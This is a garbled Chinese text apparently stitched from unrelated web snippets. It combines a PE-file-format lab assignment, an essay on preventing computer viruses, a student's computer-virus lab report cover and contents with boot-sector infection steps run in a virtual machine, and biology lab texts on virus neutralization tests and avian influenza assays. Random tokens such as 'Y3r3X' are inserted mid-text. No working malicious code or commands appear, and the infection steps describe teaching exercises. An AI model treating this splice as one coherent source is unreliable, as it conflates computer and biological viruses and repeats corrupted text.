2)查阅资料,结合第2章内容,根据PE结构编写一个小的工具软件,或者用PE Explorer、PEditor、Stud_PE等工具软件查看、分析PE 文件格式。针对PE文件格式,请思考:Win32病毒感染PE文件,须对该文件作哪些修改; PE的总体结构如下表所示: DOS MZ header部分是DOS时代遗留的产物,是PE文件的一个遗传基因,一个Win32程序如果在DOS下也是可以执行,只是提示:“This
计算机病毒的防范 随着计算机及计算机网络的发展,伴随而来的计算机病毒传播问题越来越引起人们的关注。随因特网的流行,有些计算机病毒借助网络爆发流行,如CIH计算机病毒、“爱虫”病毒等,它们与以往的计算机病毒相比具有一些新的特点,给广大计算机用户带来了极大的损失。 当计算机系统或文件染有计算机病毒时,需要检测和消除。但是,计算机病毒一旦破坏了没有副本的文件,便无法医治。隐性计算机病毒和多态性计算机病毒更使人难以检测。在与计算机病毒的对抗中,如果能采取有效的防范措施,就能使系统不染毒,或者染毒后能减少损失。 计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,及时发现计算机病毒侵入,并采取有效的手段阻止计算机病毒的传播和破坏,恢复受影响的计算机系统和数据。 计算机病毒利用读写文件能进行感染,利用驻留内存、截取中断向量等方式能进行传染和破坏。预防计算机病毒就是要监视、跟踪系统内类似的操作,提供对系统的保护,最大限度地避免各种计算机病毒的传染破坏。 计算机病毒的工作方式是可以分类的,防杀计算机病毒软件就是针对已归纳总结出的这几类计算机病毒工作方式来进行防范的。当被分析过的已知计算机病毒出现时,由于其工作方式早已被记录在案,防杀计算机病毒软件能识别出来;当未曾被分析过的计算机病毒出现时,如果其工作方式仍可被归入已知的工作方式,则这种计算机病毒能被反病毒软件所捕获。这也就是采取积极防御措施的计算机病毒防范方法优越于传统方法的地方。 计算机病毒防范工作,首先是防范体系的建设和制度的建立。没有一个完善的防范体系,一切防范措施都将滞后于计算机病毒的危害。 计算机病毒防范体系的建设是一个社会性的工作,不是一两个人、一两家企业能够实现的,需要全社会的参与,充分利用所有能够利用的资源,形成广泛的、全社会的计算机病毒防范体系网络。 一.计算机病毒的技术预防措施 下面总结出一系列行之有效的措施供参考。 1、新购置的计算机硬软件系统的测试 新购置的计算机是有可能携带计算机病毒的。因此,在条件许可的情况下,要用检测计算机病毒软件检查已知计算机病毒,用人工检测方法检查未知计算机病毒,并经过证实没有计算机病毒感染和破坏迹象后再使用。
中和试验 中和试验是病毒或毒素与相应的抗体结合后,失去对易感动物的致病力的试验方法。 所属分类:免疫学 概述 动物受到病毒感染后,体内产生特异性中和抗体,并与相应的病毒粒子呈现特异性结合,因而阻止病毒对敏感细胞的吸附,或抑制其侵入,使病毒失去感染能力。Y3r3X。 中和试验(Neutralization Test)是以测定病毒的感染力为基础,以比较病毒受免疫血清中和后的残存感染力为依据,来判定免疫血清中和病毒的能力。GMlpm。 两种试验方法介绍 中和试验常用的有两种方法:一种是固定病毒量与等量系列倍比稀释的血清混合,另一种是固定血清用量与等量系列对数稀释(即十倍递次稀释)的病毒混合。XNI6d。 (一) 定血清-稀释病毒法(病毒中和试验) 1.病毒毒价的测定毒价单位:衡量病毒毒价(毒力)的单位过去多用最小致死量(MLD),即经规定的途 径,以不同的剂量接种试验动物,在一定时间内能致全组试验动物死亡的最小剂量。但由于剂量的递增与死亡率递增不呈线性关系,在越接近100%死亡时,对剂量的递增越不敏感。而一般在死亡率越接近50%时,对剂量的变化越敏感,故现多改用半数致死量(LD50)作为毒价测定单位,即经规定的途径,以不同的剂量接种试验动物,在一定时间内能致半数试验动物死亡的剂量。用鸡胚测定时,毒价单位为鸡胚半数致死量(ELD50)或鸡胚半数感染量(EID50)。用细胞培养测定时,用组织细胞半数感染量(TCID50)。在测定疫苗的免疫性能时,则用半数免疫量(IMD50)或半数保护量(PD50)。shW6H。 (1) LD50的测定(以流行性乙型脑炎病毒为例)。 测定方法:将接种病毒,并已发病濒死的小鼠,无菌法取脑组织,称重、加稀释液充分研磨,配制成10-1悬液,3 000r/min离心20分钟,取上清液,以10倍递次稀释成10、10、10……10,每个稀释度分别接种5只小鼠,每只脑内注射0.03ml,逐日观察记录各组的死亡数。9ntgQ。
南京航空航天大学计算机病毒及防治上机实验报告 学院:理学院 专业:信息与计算科学 学号:081310128 姓名:王晨雨 授课老师:薛明富 二〇一六年十二月
实验一:引导型病毒实验 (2) 【实验目的】 (2) 【实验平台】 (2) 【试验内容】 (2) 实验二:Com病毒实验 (6) 【实验目的】 (6) 【实验平台】 (6) 【试验内容】 (6) 实验三:PE文件格式实验 (9) 实验四:32位文件型病毒实验 (11) 实验五:简单的木马实验 (14) 实验七:木马病毒清除实验(选做) (19) 实验八:Word宏病毒实验(一) (22) 实验目的 (22) 实验所需条件和环境 (22) 实验内容和分析 (23) 实验九:Word宏病毒实验(二) (27) 清除宏病毒 (29) 实验十:Linux脚本病毒实验(选做) (32) 实验十二:基于U盘传播的蠕虫病毒实验 (33) 实验十三:邮件型病毒实验 (36) 实验十四:Web恶意代码实验 (39) 实验一: (39) 实验二: (39)
实验一:引导型病毒实验 【实验目的】 通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染病毒文件的方法,提高汇编语言的使用能力。 实验内容 引导阶段病毒由软盘感染硬盘实验。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。 DOS运行时病毒由硬盘感染软盘的实现。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。 【实验平台】 VMWare Workstation 12 PRO MS-DOS 7.10 【试验内容】 第一步:环境安装 安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。 第二步:软盘感染硬盘 1)运行虚拟机,检查目前虚拟硬盘是否含有病毒,图1表示没有病毒正常启动硬盘的 状态。 2)在附书资源中复制含有病毒的虚拟软盘virus.img 3)将含有病毒的软盘插入虚拟机引导,可以看到闪动的字符*^_^*,如图2所示,按 任意键进入图3。 第三步:验证硬盘已经被感染 1)取出虚拟软盘,通过硬盘引导,再次出现了病毒的画面如图4。 2)按任意键后正常引导了DOS系统如图5。可见,硬盘已被感染。 第四步:硬盘感染软盘 1)下载empty.img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图6. 2)取出虚拟软盘,从硬盘启动,通过命令format A:/q快速格式化软盘。可能提示出 错,这时只要按R键即可。如图7. 3)成功格式化后的结果如图8。 4)不要取出虚拟软盘,重新启动虚拟机,这时是从empty.img引导,可以看到病毒的 画面,如图9。按任意键进入图10.可见,病毒已经成功由硬盘传染给了软盘。
禽流感病毒中和实验及其他方法 (一)实验材料 1、中和反应实验材料 (1)病毒: )的滴定。 一般为鸡胚尿囊病毒液,进行中和实验前,需要进行病毒滴度(TCID 50 (2)血清样品 包括待检血清和阳性以及阴性对照血清。人血清实验前需要56℃ 30分钟灭活,动物血清需RDE处理。-20℃储存,避免多次反复冻融。 (3)MDCK细胞和细胞培养试剂 1)MDCK细胞(狗肾上皮细胞) 2)MDCK细胞培养液:DMEM+5%牛血清+抗生素,过滤除菌 500毫升 DMEM(修饰的Eagles培养基) 5.5毫升 100×抗生素(100单位/毫升青霉素+100微克/毫升链霉素) 5.5毫升 100×L-Glutamine(2毫摩尔) 25.5毫升 56℃、30分钟加热灭活的牛血清 3)胰酶 / EDTA (4)其它
1)平底96孔微量培养板 2)病毒稀释液:DMEM+1%牛血清白蛋白+抗生素,即配即用。 429毫升 DMEM 66毫升 7.5%牛血清白蛋白(BSA) 5毫升 100×抗生素 3)TPCK-胰酶(使用浓度为2微克/毫升) 4)固定液:80%的丙酮,即配即用,4℃保存 400毫升丙酮 100毫升 PBS,PH 7.2 2、ELISA实验材料 (1)抗体1:鼠抗流感病毒甲型核蛋白克隆抗体 (2)抗体2:辣根过氧化物酶标记的羊抗鼠IgG (3)洗涤液:PBS+0.05%TWEEN-20 4升 PBS,PH 7.2 2毫升 TWEEN-20 (4)封闭液:PBS+1%牛血清白蛋白+0.05%TWEEN-20 867毫升PBS,PH 7.2 132毫升牛血清白蛋白 1毫升TWEEN-20